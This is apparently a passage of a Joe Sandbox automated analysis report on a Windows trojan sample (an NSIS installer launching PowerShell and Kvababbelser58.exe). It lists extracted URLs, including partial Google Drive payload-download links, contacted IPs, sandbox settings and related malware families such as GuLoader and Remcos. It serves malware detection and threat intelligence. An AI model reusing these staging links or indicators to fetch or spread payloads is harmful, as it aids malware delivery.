                              https://drive.google.com/Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/UKvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.google.com/TKvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MKvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://apis.google.comKvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.google.com/jKvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.usercontent.google.com/ontent.sandbox.google.comKvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.cpowershell.exe, 00000002.00000002.2069318942.00000000081EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercoEmKvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/_1Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.google.com/eKvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/ificateKvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/=Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.usercontent.google.com/download?id=1lZSLtwUcNH=mKvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://translate.google.com/translate_a/element.jsKvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2166743209.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/ncisco1Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.usercontent.goKvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://drive.usercontent.google.com/cKvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive.google.com/1Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.usercontent.google.com/Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.comGKvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorErrorCpfkf79Rzk.exe, 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Cpfkf79Rzk.exe, 00000000.00000000.1394783976.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kvababbelser58.exe, 00000007.00000000.2058334532.000000000040A000.00000008.00000001.01000000.00000007.sdmpfalse
                                                                                      		high
                                                                                      https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8OKvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503720643.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive.usercontent.google.com/UKvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive.usercontent.google.com;Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://drive.usercontent.google.com/IKvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://drive.usercontent.google.com/KKvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://drive.google.comKvababbelser58.exe, 00000007.00000003.2573107451.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595812052.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607422737.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584865349.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2561976244.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550492159.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.usercontent.google.com/download?id=1lZSLtwKvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      142.250.181.225
                                                                                                      		drive.usercontent.google.comUnited States
                                                                                                      		15169GOOGLEUSfalse
                                                                                                      216.58.206.46
                                                                                                      		drive.google.comUnited States
                                                                                                      		15169GOOGLEUSfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1588341
                                                                                                      Start date and time:2025-01-11 00:47:33 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 29s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:Cpfkf79Rzk.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 33.3%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 102
                                                                                                      • Number of non-executed functions: 39
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target Kvababbelser58.exe, PID 5912 because there are no executed function
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1428 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      18:48:49API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                      18:50:01API Interceptor20x Sleep call for process: Kvababbelser58.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      No context

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      s-part-0017.t-0009.t-msedge.nethttps://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 13.107.246.45
                                                                                                      OKkUGRkZV7.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 13.107.246.45
                                                                                                      240815025266174071.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                      • 13.107.246.45
                                                                                                      hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.107.246.45
                                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 13.107.246.45
                                                                                                      WN9uCxgU1T.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45

                                                                                                      ASNs

                                                                                                      No context

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      37f463bf4616ecd445d4a1937da06e19TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46
                                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 142.250.181.225
                                                                                                      • 216.58.206.46

